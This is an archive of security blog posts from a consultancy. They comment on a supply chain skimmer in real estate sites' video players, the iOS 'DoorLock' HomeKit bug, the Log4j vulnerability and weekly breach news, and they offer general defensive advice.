Category Archives: Hacks

Supply Chain Attacks Are Rampant

Today’s supply chain attack is interesting. I guess I can say that because it didn’t happen to a web site that I own and my information didn’t get stolen.

Here is the situation. Many web sites have embedded videos on them. In this case, most of the sites affected were real estate web sites and they often have virtual tour videos on the web page. In order to play a video, you need a video player. There are many video players that you can choose from, but what almost no one does is write their own video player.

Palo Alto Networks found over a hundred web sites, many or most of them (depending on which story you read) belong to the real estate firm Sotheby’s.

What happened? Some how a malicious version of the video player got loaded onto these web sites. When a visitor went to the site, the video player code was downloaded to the visitor’s computer. In this case, the malware was a data skimmer which steals information that the user provides to the website. It could be name and address information or it could be credit card information. The information can be used for social engineering or financial crimes.

The malware is polymorphic, meaning that no two copies of the malware are the same, making it difficult to detect and block. The code is also obfuscated, which makes it difficult to read and understand, so even if tried to figure out if it was malicious, it is unlikely that you could figure that out.

Now that this particular attack has become public, hackers all over the world are going to copy it. All it takes is a web site hosting the code with lax security. The hacker can then compromise the code and wait for a developer to use it.

This is not at all limited to video players, even though there are thousands of them. Any bit of shared code that is hosted in the cloud and linked to by developers is a valid target.

This means that you need to have a robust software supply chain risk management program in place, unless you want to be like these firms and dealing with a shattered reputation.

If you need help with this, please contact us.

Credit Threatpost and Bleeping Computer

Apple iOS in the Doghouse Again

iOS devices running 14.7 through 15.2 – basically all devices – are subject to a denial of service attack that forces the user to do a factory reset, wiping all of the user’s data.

If the user logs in to iCloud to restore the data, the denial of service attack will replay once the data is restored, resulting in a “rinse and repeat” cycle.

Apple was told about the bug last August but has not mitigated it. As a result, the researcher who discovered it has publicly disclosed it and created a proof of concept app to demonstrate it.

Apple has repeatedly said that they would fix it, but have not.

The bug is related to the Homekit software, which does home automation and, apparently, it does not matter whether you are doing any home automation or not. If the hacker manages to create a device name of more than 500,000 characters, which can be done in a number of ways, the iDevice goes into cardiac arrest.

For more technical details on how the attack works, read the article at the link.

Since all good attacks need a catchy name, this one is called DoorLock.

Apple did quietly create a partial mitigation in 15.1, if you know about it and use it. The attack creates a device name of more than 500,000 characters, causing the iDevice to go belly-up. There is a way to limit the device name length, but it is not set by default (why?). My guess is that maybe a half dozen Apple employees have set this to protect themselves.

One bright spot is that the hacker would either need to have access to your “home” or get you to manually accept an invitation to one. The second seems easier than the first, using a pretty vanilla social engineering scam.

If you don’t have your data backed up, you are, as they say, in a world of trouble.

There is a way, if you know what is going on, to mitigate the “rinse and repeat” loop to restore your data from iCloud, so all is not lost, but it could be very stressful.

You are now warned Credit: Bleeping Computer

Security News for the Week Ending December 31, 2021

W. Va. Hospital Breach Timeline – Way Too Long

The Monongalia Health System was attacked recently and hackers had access to several email accounts, apparently belonging to contractors from May 10 to August 15 or about three months. It took them another 60 days to investigate. They are just not telling us about the breach – more than 7 months after it started. They only figured out that they were hacked because a vendor said that they were not paid (a standard business email compromise attack). They will, no doubt, get whacked by the feds, but this is a lesson to everyone that your vendors are your risk too. Credit: ZDNet

Java Code Repo Riddled with Hidden Log4j Bugs

Remember that you should assume that any code that you download from the net is full of bugs and security holes. If you assume that, and you are lucky, then that is good, if you assume the reverse and you are not lucky, well, not so good. Threatpost is reporting that there are 17,000 unpatched Log4j packages in the Maven Central ecosystem. Many of those will never be patched. CAVEAT EMPTOR

Fallout from Kronos Ransomware Attack – Some Employees Not Receiving Full Pay

Kronos, the international HR firm suffered a ransomware attack several weeks ago. Some employees at appliance maker Electrolux are saying that they are still not receiving their full wages or in some cases, not getting paid at all. In most states the law is pretty specific about paying employees, so if you don’t want to be on the wrong end of an investigation, create a disaster recovery plan. Credit Cyber News

North Korean Hackers Stole $1.7 Billion as an Investment

North Korea considers cryptocurrency a long term investment. As a result, when they steal billions in crypto, instead of selling it, they save it. Maybe that is not a bad strategy. Bitcoin, for example, was worth $313 in 2015, $997 in 2017, $3869 in 2019 and $46,847 right now. So if you stole 1 coin in 2015, your “investment returned 150x today; that is, your $313 crime is worth $46,847. Maybe the North Koreans are onto something. Credit: Dailycoin

Oops, The Dog Ate 77 TB of Our Backups

Well, not exactly, but something ate the backups. Kyoto University in Japan lost 77 terabytes of data when a backup process went wild on their HP supercomputer. The event happened in mid-December when 34 million files were wiped from the system and the backups. The University determined that some of the data cannot be restored. The University has not said how this happened or what the impact of this failed backup process is. Credit: Bleeping Computer

Security News for the Week Ending December 24, 2021

Russian Hackers Make Millions by Stealing SEC Earning Reports

A Russian hacker working for a cybersecurity company has been extradited to the U.S. for hacking into the computer networks of two SEC filing agents used by multiple companies to file their quarterly and annual SEC reports. Using that insider information, the hacker traded stock in advance of the earnings being made public and earned millions. The hacker made the mistake of visiting Switzerland. I guess he figured that the U.S. did not know who he was. He was wrong. Credit: Bleeping Computer

Security Flaw Found in Popular Hotel Guest WiFi System

I always tell people not to use hotel guest WiFi systems because they are not secure. A researcher says that an Internet gateway used by hundreds of hotels for the guest WiFi are not secure and could put guest personal information at risk. The gateway, from Airangel, uses extremely easy to guess and hardcoded passwords. You can pretty much guess the rest. Credit: Tech Crunch

Feds Recover $154 Million in Bitcoin Stolen by Sony Employee

The U.S. has taken legal action to seize and recover $154 million stolen from Sony Life Insurance by an employee in a very basic business email compromise attack. The funds were supposed to be transferred between company accounts but were diverted. The hacker was not very smart, was in a country friendly to the U.S. (Japan), used a U.S. bank account and a Coinbase Bitcoin account, making it pretty easy to recover once found. The FBI managed, somehow, to obtain the private key for the hacker’s Bitcoin wallet, which made recovering the funds even easier. What the FBI has not disclosed is how they were able to recover the private key, probably because they do not want to disclose methods. Score one for the good guys. Credit: Bleeping Computer

Former Uber CSO Faces New Charges for Breach Cover-Up

Here is a tip about covering up a breach. Joe Sullivan, Uber’s Chief Security Officer between 2015 and 2017, faces more charges of covering up Uber’s breach. This time it is deliberately covering up a felony, which could bring him 8 years in prison and a $500,000 fine. Knowing Uber, they are probably not paying his legal costs. Moral: don’t lie. Credit: Data Breach Today

Russia Surging Both Tanks and Cyberattacks on Ukraine

In addition to moving 175,000 soldiers to the Ukraine border as Ukraine plans to join NATO, Russia is also stepping up cyberattacks on Ukraine’s financial system and critical infrastructure. In response, the US, UK and other friendly (NATO) countries have sent cyber experts to Ukraine to help defend their digital frontier. What war looks like now. Credit: Data Breach Today

Security News for the Week Ending December 17, 2021

The Gift That Keeps on Giving – Log4j – List of Affected Vendors

First, get used to hearing about this. It will be haunting us for months, at least. Jen Easterly, current head of DHS’s CISA and formerly at NSA and a professor at the US Military Academy at West Point says this may be THE WORST vulnerability she has seen in her career. As of Monday, here is a list of affected vendors. If you use any of these vendors, and it looks like a who’s who of computer software, watch for patches. Second, it looks like the first patch for Log4j, 2.15, didn’t close the hole and now there is a new release, 2.16. This will keep evolving, so if you are a company that uses software, this applies to you.

From Friday through Tuesday researchers tracked more than 840,000 attempted attacks looking for the Log4J vulnerability. They are only getting started. Credit: Ars Technica

Hackers Hit Third Cryptocurrency Company This Month-Total Haul is Over $400 Mil

Vulcan Forge is the next cryptocurrency company to get hit by hackers. They stole about $135 million from them. If you get the sense that cryptocurrency software is buggy and processes are weak, you have it about right. In VulcanForge’s case, since it is decentralized, there is no central authority to block the movement of stolen currency. This is not going to end anytime soon. Credit: Vice

Apple Airtags Make a Wonderful Stalking Tool

Stalkers are using Apple Airtags to stalk people. A woman in Arkansas, for example, got into her car and her iPhone told her that an airtag was following her. She found the tag on her trunk. If a stalker tried to hide it, say under her car somewhere, it would be more difficult to find. Apple says that Android users can detect a rogue Airtag because it will beep if it is separated from its owner for more than three days (assuming that is the case).

Credit: Apple Insider and Daily Kos. Apple has released an Android app to detect rogue trackers, but how many Android users are going to even think of downloading an Apple app. Credit: PC Mag

Feds Don’t Quite Handle Incident Response

A backdoor in the network of the United States Commission on International Religious Freedom has allowed attackers to intercept, and likely exfiltrate, all local network traffic on the agency’s systems. Security firm Avast discovered the intrusion in May, spoke the agency’s executive director and even talked to CISA. After getting no follow-up for months, Avast published their findings. Avast says that due to lack of communications from the Agency, they don’t know if they fixed the problem. They have since reached out to other agencies and NGOs focused on international rights to warn them. Maybe they fixed the problem right away? Who knows? Credit: Data Breach Today

Log4j Vulnerability Impact Grows

Log4j is a very popular server logging package used across the Internet on Linux servers and other devices. This package is used not only in corporate software development environments, but also by very well known companies like Apple. It is also used in IoT devices and other appliances.

DHS’s CISA has created a web page with guidance, here and has also put out an alert, here.

Unfortunately, due to the current state of the software industry, users will have difficulty knowing whether any software that they are running or that they are using that is running in the cloud is impacted.

If vendors were required to provide a software “bill of materials”, something which is being mandated for software used by the federal government as a result of the President’s Cybersecurity EO, then consumers like you and me would have a chance at knowing what software is impacted.

For those with a strong IT department, some vendors have released detection tools for businesses to figure out if they are running software that is vulnerable. (for example, here is Datto’s announcement, but you have to be running their management software).

CISA created a “must patch” list for executive branch agencies a month or two ago. This list includes bugs that agencies must patch and this bug was added to the list, along with 12 others.

SC Magazine says that the cleanup from this will take months, at least. Some companies will not be responsible and will not spend the time to clean up their part of the mess (i.e., patch their vulnerable software). If they don’t tell us that their software is vulnerable – and legally they are not required to – then we will continue to use it, not understanding that our systems and our data is at risk.

If this bug is exploited, and it can be exploited remotely, all data on the impacted system is at risk!

It is also important to understand that hackers, who are ALREADY exploiting this bug, will add back doors into infected systems so that even after the bug is patched, the hackers will remain inside many networks, lurking undetected.

There are many cases of hackers remaining inside corporate networks, undetected, for years.

Given that there are 3 billion or so devices running Java, some percentage of those need to log and this is the go to package. Many of those devices will never be patched and always be a hole into your network.

Among vendors that we think are impacted are Amazon’s AWS, Broadcom, Cisco, Connectwise, Fortinet, HCL, IBM, N-Able, Okta, VMWare and likely hundreds of others. Not all products from these vendors are affected.

Businesses need to hold their vendors accountable. Unless you are a big company with clout you probably can’t force your vendors to be accountable, but if you don’t ask, you certainly won’t get information.

Also, all users need to stay current on all patches. Hopefully, most vendors will be responsible and release patches. This is one place that small companies get to benefit from large businesses ability to beat up the same vendors that you use.

Users get to be vigilant. Probably vendors will be releasing patches over the next few months. This one will not be over soon. Vendors may release alerts and workarounds.

If you are running any old, unsupported software, you are basically on your own. Not only will you not get any patches, you probably won’t even know that you are running affected software.

Also remember that if your vendor gets hacked as a result of this bug, you are both responsible and likely legally liable. Just saying.

If you have questions, please contact us.